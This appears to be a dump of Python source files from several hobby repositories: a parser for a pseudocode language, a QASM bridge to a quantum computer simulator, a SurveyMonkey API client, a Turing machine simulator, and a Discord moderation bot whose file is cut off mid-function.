if self._match([TokenType.RETURN]):
return self._returnStatement()
if self._match([TokenType.WHILE]):
return self._whileStatement()
return self._expressionStatement()
def _forStatement(self):
if self._match([TokenType.VAR]):
identifier = self._consume(TokenType.IDENTIFIER, "Expect variable identifier.")
self._consume(TokenType.LEFT_ARROW, "Expect '<-' after variable identifier.")
expression = self._expression()
initializer = Statement.Variable(identifier, expression)
else:
raise self._error(self._peek(), "Expect a variable declaration after 'FOR'.")
self._consume(TokenType.TO, "Expect 'TO' after varable declaration.")
right = self._oneDimensionalArithmetic()
condition = Expression.Binary(
Expression.Variable(identifier),
Token(TokenType.LESS_EQUAL, "<=", None, "NULL", -1),
right
)
increment = Expression.Assign(identifier, Expression.Binary(
Expression.Variable(identifier),
Token(TokenType.PLUS, "+", None, "NULL", -1),
Expression.Literal(1.0)
))
self._consume(TokenType.DO, "Expect 'DO' at end of for loop initialization.")
body = self._bodyDeclaration(TokenType.ENDFOR)
self._consume(TokenType.ENDFOR, "Expect 'ENDFOR' at end of the for loop.")
body.append(Statement.Expression(increment))
return Statement.For(initializer, condition, body)
def _ifStatement(self):
condition = self._or()
self._consume(TokenType.THEN, "Expect 'THEN' after if statement condition.")
thenBranch = []
elseBranch = None
while not(self._check(TokenType.ENDIF) or self._check(TokenType.ELSE)) and not self._isAtEnd():
thenBranch.append(self._declaration())
if self._match([TokenType.ELSE]):
elseBranch = self._bodyDeclaration(TokenType.ENDIF)
self._consume(TokenType.ENDIF, "Expect 'ENDIF' at end of the if statement.")
return Statement.If(condition, thenBranch, elseBranch)
def _outputStatement(self):
value = self._expression()
#self._consume(TokenType.SEMICOLON, "Expect ';' after output value.")
return Statement.Output(value);
def _returnStatement(self):
keyword = self._previous()
value = None
if not self._check(TokenType.SEMICOLON):
value = self._expression()
#self._consume(TokenType.SEMICOLON, "Expect ';' after return value.")
return Statement.Return(keyword, value)
def _whileStatement(self):
condition = self._expression()
self._consume(TokenType.DO, "Expect 'DO' after condition")
body = self._bodyDeclaration(TokenType.ENDWHILE)
self._consume(TokenType.ENDWHILE, "Expect 'ENDWHILE' at then end of the while statement.")
return Statement.While(condition, body)
def _expressionStatement(self):
expression = self._expression()
#self._consume(TokenType.SEMICOLON, "Expect ';' after expression.")
return Statement.Expression(expression)
def _expression(self):
return self._assignment()
def _assignment(self):
expression = self._or()
if self._match([TokenType.LEFT_ARROW]):
leftArrow = self._previous()
value = self._assignment()
if isinstance(expression, Expression.Variable):
identifier = expression.getIdentifier()
return Expression.Assign(identifier, value)
elif isinstance(expression, Expression.Get):
return Expression.Set(expression.getObject(), expression.getIdentifier(), value)
elif isinstance(expression, Expression.GetIndex):
return Expression.SetIndex(expression.getObject(), expression.getIndices(), expression.getBrackets(), value)
self._error(leftArrow, "Invalid assignment target.")
return expression
def _or(self):
expression = self._and()
while self._match([TokenType.OR]):
operator = self._previous()
right = self._and() #check this line!
expression = Expression.Logical(expression, operator, right)
return expression
def _and(self):
expression = self._equality()
while self._match([TokenType.AND]):
operator = self._previous()
right = self._equality()
expression = Expression.Logical(expression, operator, right)
return expression
def _equality(self):
expression = self._comparison()
while self._match([TokenType.NOT_EQUAL, TokenType.EQUAL]):
operator = self._previous()
right = self._comparison()
expression = Expression.Binary(expression, operator, right)
return expression
def _comparison(self):
expression = self._oneDimensionalArithmetic()
while self._match([TokenType.LESS, TokenType.GREATER, TokenType.LESS_EQUAL, TokenType.GREATER_EQUAL]):
operator = self._previous()
right = self._oneDimensionalArithmetic()
expression = Expression.Binary(expression, operator, right)
return expression
def _oneDimensionalArithmetic(self):
expression = self._twoDimensionalArithmetic()
while self._match([TokenType.PLUS, TokenType.MINUS]):
operator = self._previous()
right = self._twoDimensionalArithmetic()
expression = Expression.Binary(expression, operator, right)
return expression
def _twoDimensionalArithmetic(self):
expression = self._unary()
while self._match([TokenType.SLASH, TokenType.STAR]):
operator = self._previous()
right = self._unary()
expression = Expression.Binary(expression, operator, right)
return expression
def _unary(self):
if self._match([TokenType.NOT, TokenType.MINUS]):
operator = self._previous()
right = self._unary()
return Expression.Unary(operator, right)
return self._index()
def _functionCall(self):
expression = self._primary()
while True:
if self._match([TokenType.LEFT_PAREN]):
expression = self._finishFunctionCall(expression)
elif self._match([TokenType.DOT]):
identifier = self._consume(TokenType.IDENTIFIER, "Expect property identifier after '.'.")
expression = Expression.Get(expression, identifier)
else:
break
return expression
def _finishFunctionCall(self, caller):
arguments = []
if not self._check(TokenType.RIGHT_PAREN):
while True:
if len(arguments) >= 8:
self._error(self._peek(), "Cannot have more than 8 arguments.")
arguments.append(self._expression())
if not self._match([TokenType.COMMA]):
break
parantheses = self._consume(TokenType.RIGHT_PAREN, "Expect ')' after arguments.")
return Expression.Call(caller, parantheses, arguments)
def _index(self):
expression = self._functionCall()
if self._match([TokenType.LEFT_SQUARE]):
indices = []
while True:
if not self._peek().getType() in [TokenType.IDENTIFIER, TokenType.NUMBER]:
self._error(self._peek(), "Expect identifier or number for index value.")
indices.append(self._expression())
if not self._match([TokenType.COMMA]):
break
brackets = self._consume(TokenType.RIGHT_SQUARE, "Expect ']' after index value.")
return Expression.GetIndex(expression, indices, brackets)
return expression
def _primary(self):
if self._match([TokenType.FALSE]):
return Expression.Literal(False)
if self._match([TokenType.TRUE]):
return Expression.Literal(True)
if self._match([TokenType.NULL]):
return Expression.Literal(None)
if self._match([TokenType.NUMBER, TokenType.STRING]):
return Expression.Literal(self._previous().getLiteral())
if self._match([TokenType.SUPER]):
keyword = self._previous()
self._consume(TokenType.DOT, "Expect '.' after 'SUPER'.")
method = self._consume(TokenType.IDENTIFIER, "Expect super class method name.")
return Expression.Super(keyword, method)
if self._match([TokenType.THIS]):
return Expression.This(self._previous())
if self._match([TokenType.LEFT_BRACE]):
values = []
while True:
values.append(self._expression())
if not self._match([TokenType.COMMA]):
break
self._consume(TokenType.RIGHT_BRACE, "Expect '}' after values.")
return Expression.List(values)
if self._match([TokenType.IDENTIFIER]):
return Expression.Variable(self._previous())
if self._match([TokenType.LEFT_PAREN]):
expression = self._expression()
self._consume(TokenType.RIGHT_PAREN, "Expect ')' after expression.")
return Expression.Grouping(expression)
raise self._error(self._peek(), "Expect expression.")
def _consume(self, token, message):
if self._check(token):
return self._move()
raise self._error(self._peek(), message)
def _error(self, token, message):
self._errors.append(ParseError(token, message))
return self._errors[-1]
def _match(self, tokens):
for token in tokens:
if self._check(token):
self._move()
return True
return False
def _check(self, tokenType):
if self._isAtEnd():
return False
return self._peek().getType() == tokenType
def _move(self):
if not self._isAtEnd():
self._current += 1
return self._previous()
def _previous(self):
return self._tokens[self._current - 1]
def _peek(self):
return self._tokens[self._current]
def _isAtEnd(self):
return self._peek().getType() == TokenType.EOF
def _synchronise(self):
self._move()
while not self._isAtEnd():
if self._previous().getType() == TokenType.SEMICOLON:
return
if self._peek().getType() in [
TokenType.CLASS,
TokenType.FUNCTION,
TokenType.VAR,
TokenType.FOR,
TokenType.IF,
TokenType.WHILE,
TokenType.OUTPUT,
TokenType.RETURN
]:
return
self._move()
```
#### File: Pseudo/pyPseudo/Utilities.py
```python
def readFile(path):
try:
with open(path, "r") as file:
return file.read()
except:
print(
"{Error: Failed to load file. File doesn't exist or invalid file path, "
+ "Message: Please check arguments or import strings.}"
)
return ""
class Stack:
def __init__(self):
self._stack = []
def isEmpty(self):
return len(self._stack) == 0
def peek(self):
return self._stack[-1] if not self.isEmpty() else None
def push(self, element):
self._stack.append(element)
def pop(self):
return self._stack.pop() if not self.isEmpty() else None
def get(self, index):
return self._stack[index] if index < len(self._stack) and index >= 0 else None
def __len__(self):
return len(self._stack)
``` |
{
"source": "johnyob/QASM",
"score": 3
} |
#### File: qasm/bridge/Bridge.py
```python
from qasm.parser.Statement import StatementVisitor
from qasm.error.BridgeError import BridgeError
from quantum_computer import Computer
class Bridge(StatementVisitor):
def __init__(self, statements, qubits):
"""
Bridge constructor.
Bridge for qasm.parser.Statement.Statement objects.
Constructs a interface between the ASM and the Quantum Computer
:param statements: list of statements produced by the parser (list)
:param registers: number of qubits in quantum computer (integer)
"""
self._statements = statements
self._qubits = qubits
self._quantum_computer = Computer(qubits)
self._errors = []
def _validate_qubit(self, qubit):
"""
If :param qubit out of index range -> bridge error raised.
:param qubit: (qasm.lexer.Token.Token)
:return: (None)
"""
if not 1 <= qubit.get_literal() <= self._qubits:
raise BridgeError(qubit, "Qubit index out of range")
def visit_pauli_x_statement(self, statement):
"""
Handles pauli x gate application to the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.PauliX)
:return: (None)
"""
qubit = statement.get_qubit()
self._validate_qubit(qubit)
self._quantum_computer.X(qubit.get_literal())
def visit_pauli_y_statement(self, statement):
"""
Handles pauli y gate application to the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.PauliY)
:return: (None)
"""
qubit = statement.get_qubit()
self._validate_qubit(qubit)
self._quantum_computer.Y(qubit.get_literal())
def visit_pauli_z_statement(self, statement):
"""
Handles pauli z gate application to the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.PauliZ)
:return: (None)
"""
qubit = statement.get_qubit()
self._validate_qubit(qubit)
self._quantum_computer.Z(qubit.get_literal())
def visit_hadamard_statement(self, statement):
"""
Handles hadamard gate application to the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.Hadamard)
:return: (None)
"""
qubit = statement.get_qubit()
self._validate_qubit(qubit)
self._quantum_computer.H(qubit.get_literal())
def visit_phase_shift_statement(self, statement):
"""
Handles phase shift gate application to the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.PhaseShift)
:return: (None)
"""
qubit = statement.get_qubit()
self._validate_qubit(qubit)
self._quantum_computer.R(qubit.get_literal(), statement.get_phi().get_literal())
def visit_sqrt_not_statement(self, statement):
"""
Handles sqrt not gate application to the quantum register stored in _quantum_computer
:param statement: (qasm.parser.Statement.SqrtNot)
:return: (None)
"""
qubit = statement.get_qubit()
self._validate_qubit(qubit)
self._quantum_computer.SqrtNOT(qubit.get_literal())
def visit_measure_statement(self, statement):
"""
Handles quantum register stored in _quantum_computer observation algorithm
:param statement: (qasm.parser.Statement.Measure)
:return: (None)
"""
print(self._quantum_computer.measure())
def execute(self):
"""
Executes statements stored in _statements.
If a bridge (or error from the quantum computer) error occurs during the execution of statements, then the
error is appended to the internal errors list and the program is halted.
:return: (None)
"""
try:
for statement in self._statements:
self._execute_statement(statement)
except (BridgeError, Exception) as error:
self._error(error)
return
def _execute_statement(self, statement):
"""
Executes :param statement using public AST (Abstract Syntax Tree) traversal method.
:param statement: (qasm.parser.Statement.Statement)
:return: (None)
"""
statement.accept(self)
def _error(self, error):
"""
Appends bridge error :param error to internal errors list
:param error: (qasm.error.VirtualMachineError)
:return: (None)
"""
self._errors.append(error)
def get_errors(self):
"""
Returns internal bridge errors
:return: (list)
"""
return self._errors
```
#### File: bridge/config/QuantumComputerConfig.py
```python
import json
from qasm.helpers.Exceptions import QASMConfigException
from qasm.helpers.Constants import QC_CONFIG
from qasm.helpers.Util import read_file
class QuantumComputerConfig:
@staticmethod
def get_config():
try:
return json.loads(read_file(QC_CONFIG))
except:
raise QASMConfigException({
"message": "quantum computer config not setup. Please use qasm config setup."
})
@staticmethod
def get_qubits():
return QuantumComputerConfig.get_config()["qubits"]
```
#### File: qasm/commands/Execute.py
```python
import sys
from qasm.commands.Command import Command
from qasm.helpers.Util import read_file
from qasm.parser.Parser import Parser
from qasm.lexer.Lexer import Lexer
from qasm.bridge.Bridge import Bridge
from qasm.bridge.config.QuantumComputerConfig import QuantumComputerConfig
class Execute(Command):
def __init__(self, arguments):
super().__init__(arguments)
self._file_location = self._arguments["<file>"]
def run(self):
errors, bridge_errors = self._run(read_file(self._file_location))
if errors:
sys.exit(65)
if bridge_errors:
sys.exit(70)
def _run(self, source):
lexer_errors, parser_errors, bridge_errors = [], [], []
lexer = Lexer(source)
tokens = lexer.scan_tokens()
lexer_errors = lexer.get_errors()
self._print_errors(lexer_errors)
if lexer_errors:
return lexer_errors + parser_errors, bridge_errors
parser = Parser(tokens)
statements = parser.parse()
parser_errors = parser.get_errors()
self._print_errors(parser_errors)
if parser_errors:
return lexer_errors + parser_errors, bridge_errors
bridge = Bridge(
statements, QuantumComputerConfig.get_qubits()
)
bridge.execute()
bridge_errors = bridge.get_errors()
self._print_errors(bridge_errors)
return lexer_errors + parser_errors, bridge_errors
def _print_errors(self, errors):
for error in errors:
if hasattr(error, "report"):
print(error.report(), file=sys.stderr)
else:
print("[ERROR] Error: QASMPythonError, Response: {0}".format(error), file=sys.stderr)
``` |
{
"source": "johnyob/Quantum-Computer-Simulator",
"score": 2
} |
#### File: quantum_computer_simulator/gates/R.py
```python
import numpy as np
from quantum_computer_simulator.gates.SingleQubitGate import SingleQubitGate
class R(SingleQubitGate):
def __init__(self, phi):
super().__init__(np.array([
[1, 0],
[0, np.e ** ((0 + 1j) * phi)]
], dtype=complex))
```
#### File: quantum_computer_simulator/gates/Z.py
```python
import numpy as np
from quantum_computer_simulator.gates.SingleQubitGate import SingleQubitGate
class Z(SingleQubitGate):
def __init__(self):
super().__init__(np.array([
[1, 0],
[0, -1]
], dtype=complex))
```
#### File: quantum_computer_simulator/simulator/Computer.py
```python
import numpy as np
from quantum_computer_simulator.helpers.Exceptions import QuantumRegisterException
from quantum_computer_simulator.helpers.Util import decimal_to_binary
import quantum_computer_simulator.gates as Gates
class Computer:
def __init__(self, qubits):
self._qubits = qubits
self._state = np.zeros(2 ** self._qubits, dtype=complex)
self._state[0] = 1 + 0j
self._measured_value = None
def _apply_gate(self, gate, *args):
if self._measured_value:
raise QuantumRegisterException({
"message": "cannot apply a gate to a measured quantum register"
})
logic_gate_matrix = gate.generate_gate_matrix(args, self._qubits)
print(logic_gate_matrix)
self._state = logic_gate_matrix.dot(self._state)
def measure(self):
if not self._measured_value:
print(self._state)
probabilities = [
abs(i) ** 2 for i in self._state
]
print(probabilities)
self._measured_value = "|psi> = |{0}>".format("".join(map(str, decimal_to_binary(
self._qubits,
np.random.choice(
range(len(probabilities)),
p=probabilities
)
))))
return self._measured_value
def X(self, qubit):
return self._apply_gate(Gates.X(), qubit)
def Y(self, qubit):
return self._apply_gate(Gates.Y(), qubit)
def Z(self, qubit):
return self._apply_gate(Gates.Z(), qubit)
def R(self, qubit, phi):
return self._apply_gate(Gates.R(phi), qubit)
def H(self, qubit):
return self._apply_gate(Gates.H(), qubit)
def SqrtNOT(self, qubit):
return self._apply_gate(Gates.SqrtNOT(), qubit)
def CNOT(self, qubit_1, qubit_2):
return self._apply_gate(Gates.CNOT(), qubit_1, qubit_2)
``` |
{
"source": "johnyob/Survey-Monkey-API-Client",
"score": 3
} |
#### File: Survey-Monkey-API-Client/survey_monkey/Client.py
```python
import requests
import json
from survey_monkey.helpers.Util import read_file, get_param_names, get_full_endpoint_path, get_headers, get_url
from survey_monkey.helpers.Constants import DEFAULT_ENDPOINTS_FILE_PATH, DEFAULT_VERSION
from survey_monkey.helpers.Exceptions import SurveyMonkeyAPIException
class Client:
def __init__(self, access_token, version=DEFAULT_VERSION, endpoints_file_path=DEFAULT_ENDPOINTS_FILE_PATH):
"""
Creates the API interface
:param access_token: Survey Monkey access token (string)
:param version: Survey Monkey API version (string)
:param endpoints_file_path: Absolute path for endpoints.json file (string)
"""
self._version = version
endpoints_json = json.loads(read_file(endpoints_file_path))
for endpoint in endpoints_json:
endpoint_function = self._get_endpoint_function(endpoint, access_token)
setattr(self, endpoint["identifier"], endpoint_function)
@property
def version(self):
return self._version
def _get_endpoint_function(self, endpoint, access_token):
"""
Produces function that interacts with the Survey Monkey API based on endpoint schema
:param endpoint: the endpoint schema for the Survey Monkey API endpoint (dict)
:param access_token: Survey Monkey access token (string)
:return: (function)
"""
identifier = endpoint["identifier"]
path = endpoint["endpoint path"]
param_names = get_param_names(path)
def endpoint_function(*args, **request_kwargs):
"""
Endpoint function
:param args: function arguments (list)
:param request_kwargs: requests.request kwargs
:return: (dict)
"""
if len(args) != len(param_names):
raise SurveyMonkeyAPIException({
"message": "{0} expects {1} arguments but got {2} arguments".format(
identifier,
len(param_names),
len(args)
)
})
return self._request(
endpoint["method"],
get_full_endpoint_path(path, param_names, args),
access_token,
**request_kwargs
)
endpoint_function.__name__ = identifier
return endpoint_function
def _request(self, method, path, access_token, **request_kwargs):
"""
Wrapper for requests.request
:param method: HTTP method such that method in {"GET", "POST", ...} (string)
:param path: endpoint path (contains params) (string)
:param access_token: Survey Monkey API access token (string)
:param request_kwargs: requests.request kwargs
:return: (dict)
"""
request_kwargs["headers"] = get_headers(
request_kwargs.get("headers", {}),
access_token
)
url = get_url(self.version, path)
response = requests.request(method, url, **request_kwargs)
return self._handle_response(response)
def _handle_response(self, response):
"""
Handles responses. If response is invalid, raises a SurveyMonkeyAPIException
:param response: response from API (response object)
:return: (dict)
"""
if not response.content:
raise SurveyMonkeyAPIException({
"message": "no content in response",
"response": response.json()
})
if not response.ok:
raise SurveyMonkeyAPIException({
"message": "Method: {0}, URL: {1}, Status Code: {2}".format(
response.request.method,
response.request.url,
response.status_code
),
"response": response.json()
})
return response.json()
```
#### File: survey_monkey/helpers/Util.py
```python
import re
from survey_monkey.helpers.Constants import DEFAULT_ADDRESS, PARAMETER_REGEX
def read_file(file_location):
"""
Reads the file stored at :param file_location
:param file_location: absolute path for the file to be read (string)
:return: contents of file (string)
"""
try:
with open(file_location, "r") as file:
return file.read()
except FileNotFoundError:
return ""
def get_param_names(path):
"""
Returns list of parameter names from the path.
For example, given the endpoint "groups/{group_id}", this function will return ["group_id"]
:param path: Survey Monkey API endpoint path (string)
:return: (list)
"""
return re.findall(PARAMETER_REGEX, path)
def get_full_endpoint_path(path, param_names, args):
"""
Get the full path for the api endpoint, includes parameters
:param path: Survey Monkey API endpoint path. For example, "survey/{survey_id}" (string)
:param param_names: Parameter names ["survey_id"] (list)
:param args: List of arguments that will be assigned to the parameters (list)
:return: (string)
"""
params = {
param_name: args[i]
for i, param_name in enumerate(param_names)
}
return path.format(**params)
def get_headers(headers, access_token):
"""
Updates the headers with the Survey Monkey API access token
:param headers: HTTP headers (from request) (dict)
:param access_token: Survey Monkey access token (string)
:return: (dict)
"""
updated_headers = dict(headers)
updated_headers.update({
"Authorization": "Bearer {0}".format(access_token),
"Content-Type": "application/json"
})
return updated_headers
def get_url(version, path, address=DEFAULT_ADDRESS):
"""
Returns full url for the API request
:param version: API version. For example, "v3" (at the time of writing) (string)
:param path: API endpoint path with arguments. For example, "survey/177282517" (string)
:param address: API address. For example "http://api.surveymonkey.net" (string)
:return: (string)
"""
return address + "/" + version + "/" + path
``` |
{
"source": "johnyob/Turing-Machine-Simulator",
"score": 3
} |
#### File: Turing-Machine-Simulator/turing_machine/TuringMachine.py
```python
from turing_machine.helpers.Constants import STATE_TYPES, SYMBOL_TYPES, MOVEMENT_TYPES, BLANK
from turing_machine.TransitionFunctions import TransitionFunctions
import turing_machine.helpers.Exceptions as Exceptions
from turing_machine.State import State
from turing_machine.Tape import Tape
class TuringMachine:
def __init__(
self, states, alphabet, initial_state, accepting_states,
rejecting_states, transition_functions, trace_flag=False
):
"""
Turing Machine constructor
:param states: set of states in the turing machine (list: (string|integer))
:param alphabet: set of symbols in the turing machine's alphabet (list: string)
:param initial_state: initial state of the turing machine. initial_state \in states (string|integer)
:param accepting_states: accepting states of the turing machine. accepting_states \subseteq states (list: (string|integer))
:param rejecting_states: rejecting states of the turing machine. rejecting_states \subseteq states (list: (string|integer))
:param transition_functions: (dict)
"""
if not isinstance(states, list):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid states data type",
"expected data type": "list",
"states": states
})
if not all(isinstance(state, STATE_TYPES) for state in states):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid data type for states element",
"expected data type": "string or integer",
"states": states
})
self._states = states
if not isinstance(alphabet, list):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid alphabet data type",
"expected data type": "list",
"alphabet": alphabet
})
if not all(isinstance(symbol, SYMBOL_TYPES) for symbol in alphabet):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid data type for alphabet element",
"expected data type": "string",
"alphabet": alphabet
})
if BLANK not in alphabet:
alphabet.append(BLANK)
self._alphabet = alphabet
if not isinstance(initial_state, STATE_TYPES):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid initial state data type",
"expected data type": "string or integer",
"initial state": initial_state
})
if initial_state not in self._states:
raise Exceptions.TuringMachineStateException({
"message": "invalid initial state",
"valid states": self._states,
"initial state": initial_state
})
self._initial_state = initial_state
if not isinstance(accepting_states, list):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid accepting states data type",
"expected data type": "list",
"accepting states": accepting_states
})
if not all(isinstance(state, STATE_TYPES) for state in accepting_states):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid data type for accepting states element",
"expected data type": "string or integer",
"accepting states": accepting_states
})
if not set(accepting_states).issubset(self._states):
raise Exceptions.TuringMachineStateException({
"message": "accepting states set is not a subset of states",
"valid states": self._states,
"accepting states": accepting_states
})
self._accepting_states = accepting_states
if not isinstance(rejecting_states, list):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid rejecting states data type",
"expected data type": "list",
"rejecting states": rejecting_states
})
if not all(isinstance(state, STATE_TYPES) for state in rejecting_states):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid data type for rejecting states element",
"expected data type": "string or integer",
"rejecting states": rejecting_states
})
if not set(rejecting_states).issubset(self._states):
raise Exceptions.TuringMachineStateException({
"message": "rejecting states set is not a subset of states",
"valid states": self._states,
"rejecting states": rejecting_states
})
self._rejecting_states = rejecting_states
self._transition_functions = TransitionFunctions(transition_functions)
self._trace_flag = trace_flag
def _trace(self, current_state, tape, head_location):
"""
Displays tracing for the turing machine. Outputs the current state, the contents of the tape and the visual
position of the read/write head along the tape.
:param current_state: the current state of the turing machine (integer|string)
:param tape: infinite tape for the turing machine (Tape)
:param head_location: read/write head location pointer (integer)
:return: (None)
"""
print("\nCurrent state: {0}".format(current_state))
print("Tape:")
print(tape)
print(" " * head_location + "^")
def _accepted(self, current_state):
"""
Returns whether the :param current_state is a member of the accepting states set
:param current_state: (integer|string)
:return: (boolean)
"""
return current_state in self._accepting_states
def _rejected(self, current_state):
"""
Returns whether the :param current_state is a member of the rejecting states set
:param current_state: (integer|string)
:return: (boolean)
"""
return current_state in self._rejecting_states
def _run(self, tape):
"""
Run method for turing machine.
Executes transition functions based on :param tape
:param tape: initial tape string(string)
:return: (State)
"""
tape = Tape(tape)
current_state = self._initial_state
head_location = 0
while True:
if self._trace_flag:
self._trace(current_state, tape, head_location)
if self._accepted(current_state):
return State.ACCEPTED
if self._rejected(current_state):
return State.REJECTED
symbol = tape[head_location]
out_state, out_symbol, movement = self._transition_functions[(
current_state, symbol
)]
if out_state not in self._states:
raise Exceptions.TuringMachineStateException({
"message": "invalid output state",
"valid states": self._states,
"output state": out_state
})
if out_symbol not in self._alphabet:
raise Exceptions.TuringMachineSymbolException({
"message": "output symbol not in alphabet",
"alphabet": self._alphabet,
"output symbol": out_symbol
})
if not isinstance(movement, MOVEMENT_TYPES):
raise Exceptions.TuringMachineMovementException({
"message": "invalid read/write head movement",
"movement": movement
})
tape[head_location] = out_symbol
current_state = out_state
head_location += movement
def execute(self, tape):
"""
Executes the turing machine using the contents of :param tape and displays the reason why the turing machine
halts, if it halts
:param tape: initial tape contents (string)
:return: (None)
"""
accepted = self.accepts(tape)
print("\nTuring Machine: Halted")
print("Reason for halting: moved into {0} state".format(
"accepting" if accepted else "rejecting"
))
def accepts(self, tape):
"""
Displays whether turing machine moves into an accepting state
:param tape: initial tape string (string)
:return: (boolean)
"""
return self._run(tape) == State.ACCEPTED
def rejects(self, tape):
"""
Returns whether turing machine moves into a rejecting state
:param tape: initial tape string (string)
:return: (boolean)
"""
return self._run(tape) == State.REJECTED
``` |
{
"source": "johnyoonh/twitchExt",
"score": 3
} |
#### File: twitchExt/services/query.py
```python
import requests
import xml.etree.ElementTree as ET
from Song import Song
import csv
import sqlite3
def getArtists():
with open('Artists.csv', 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for i in range(1237):
next(reader)
for row in reader:
x = row[1]
try:
int(x)
get(x)
except ValueError:
get(row[2])
def get(artistId):
conn = sqlite3.connect('song.db')
c = conn.cursor()
nonce = True
page = 1
pops = []
totalpop = 0
while nonce:
url = 'http://api.7digital.com/1.2/artist/toptracks?shopId=2020&oauth_consumer_key=7d4vr6cgb392&artistId=' + str(artistId) + '&usageTypes=adsupportedstreaming&pagesize=50&page=' + str(page)
r = requests.get(url)
tree = ET.fromstring(r.text)
for child in tree:
children = child.findall('track')
if len(children) < 50:
nonce = False
for x in children:
data = [artistId, x.attrib['id'], x.find('title').text, x.find('duration').text, x.find('explicitContent').text, x.find('popularity').text]
print(data)
c.execute("insert into songs(artistid, id, title, duration, explicitContent, popularity) values (?, ?, ?, ?, ?, ?)", (data[0],data[1],data[2],data[3],data[4], data[5]))
page += 1
conn.commit()
def normalize(val):
conn = sqlite3.connect('song.db')
c = conn.cursor()
c.execute("update songs set normalizedPopularity = (?)")
def createSongDb():
conn = sqlite3.connect('song.db')
c = conn.cursor()
c.execute("create table songs(artistid, id, title, duration, explicitContent, popularity);")
# createSongDb()
getArtists()
``` |
{
"source": "Johnypier/First_Bot",
"score": 3
} |
#### File: Johnypier/First_Bot/judicator.py
```python
import discord
import secrets
import random
import platform
import constants
import utilities
import datetime
from types import SimpleNamespace
from discord.ext import commands
from discord.commands import Option
bot = commands.Bot(
intents=discord.Intents.all(),
status=discord.Status.streaming,
activity=constants.ACTIVITIES['STREAM']
)
bot.colors = constants.BOT_COLORS
bot.color_list = SimpleNamespace(**bot.colors)
@bot.event
async def on_ready():
channel = await bot.fetch_channel(936376047417569280)
await channel.purge(limit=1)
await channel.send("Will you share your knowledge with others and help all members of this server?", view=utilities.RoleView())
print(
f"-----\nLogged in as: {bot.user.name} : {bot.user.id}\n-----\nMy current activity:{bot.activity}\n-----")
@bot.event
async def on_message(message: discord.Message):
"""
Checks for users messages.
"""
if message.author == (bot.user or message.author.bot):
return
# Change to true if you want to enable censorship
if constants.CENSORHIP_STATUS:
channel = message.channel
censored_message = utilities.censor_message(message.content)
if message.content != censored_message:
await message.delete()
await channel.send(message.author.mention + f" Censored: {censored_message} ")
@bot.slash_command(description="Ping-Pong game.", guild_ids=[int(secrets.GUILD_ID)])
async def ping(ctx: discord.ApplicationContext):
await ctx.respond(f"Pong! {random.randrange(0, 1000)} ms")
@bot.slash_command(description="Greets the user.", guild_ids=[int(secrets.GUILD_ID)])
async def hello(ctx: discord.ApplicationContext):
"""
A simple command which says hi to the author.
"""
await ctx.respond(f"Hi {ctx.author.mention}!")
@bot.slash_command(description="Deletes specified amount of messages from channel.", guild_ids=[int(secrets.GUILD_ID)])
@commands.is_owner()
async def clear(
ctx: discord.ApplicationContext,
limit: Option(int, "Enter number of messages")
):
"""
Deletes number of messages specified by owner
"""
await ctx.channel.purge(limit=limit)
await ctx.respond("Channel cleared!")
@clear.error
async def clear_error(ctx: discord.ApplicationContext, error):
"""
Error handler for cleaning function
"""
if isinstance(error, commands.CheckFailure):
await ctx.respond("Hey! You lack permission to use this command as you do not own the bot.")
else:
raise error
@bot.slash_command(description="Turns off the bot.", guild_ids=[int(secrets.GUILD_ID)])
@commands.is_owner()
async def logout(ctx: discord.ApplicationContext):
"""
If the user running the command owns the bot then this will disconnect the bot from discord.
"""
await ctx.respond(f"Hey {ctx.author.mention}, I am now logging out :wave:")
await bot.close()
@logout.error
async def logout_error(ctx: discord.ApplicationContext, error):
"""
Whenever the logout command has an error this will be tripped.
"""
if isinstance(error, commands.CheckFailure):
await ctx.respond("Hey! You lack permission to use this command as you do not own the bot.")
else:
raise error
@bot.slash_command(description="Shows bot information.", guild_ids=[int(secrets.GUILD_ID)])
async def stats(ctx: discord.ApplicationContext):
"""
A usefull command that displays bot statistics.
"""
embed = discord.Embed(title=f'{bot.user.name} Stats', description='\uFEFF',
colour=ctx.author.colour, timestamp=datetime.datetime.utcnow())
embed.add_field(name="Bot version:", value="2.0")
embed.add_field(name='Python Version:', value=platform.python_version())
embed.add_field(name='Discord.Py Version', value=discord.__version__)
embed.add_field(name='Total Guilds:', value=str(len(bot.guilds)))
embed.add_field(name='Total Users:', value=str(
len(set(bot.get_all_members()))))
embed.add_field(name='Bot owner:', value="<@503505263119040522>")
embed.add_field(name='Bot Developers:',
value="<@503505263119040522>\n<@453579828281475084>\n<@890664690533957643>")
embed.set_footer(text=f"{bot.user.name}",
icon_url=f"{bot.user.avatar.url}")
await ctx.respond(embed=embed)
@bot.slash_command(description="Sends information to specific channel in beautiful block.", guild_ids=[int(secrets.GUILD_ID)])
async def post(
ctx: discord.ApplicationContext,
info: Option(str, "Enter your information"),
channel: Option(discord.TextChannel, "Select a channel"),
topic: Option(str, "Enter your title")
):
temp = channel.name
if temp not in constants.BLOCKED_CHANNELS:
embed = discord.Embed(title=topic, description='\uFEFF',
colour=ctx.author.colour, timestamp=datetime.datetime.utcnow())
embed.add_field(name="Information", value=info)
if (ctx.author.avatar == None):
embed.set_footer(text=f"{ctx.author.name}",
icon_url=f"{bot.user.avatar.url}")
else:
embed.set_footer(text=f"{ctx.author.name}",
icon_url=f"{ctx.author.avatar.url}")
guild = bot.get_guild(int(secrets.GUILD_ID))
for ch in guild.channels:
if ch.name == temp:
await ch.send(embed=embed)
await ctx.respond("Message sent!")
return
await ctx.respond("Channel not found!")
else:
await ctx.respond("You are not able to write messages in " + temp + " channel!")
@bot.slash_command(description="Shows all available channels for post command.", guild_ids=[int(secrets.GUILD_ID)])
async def channels(ctx: discord.ApplicationContext):
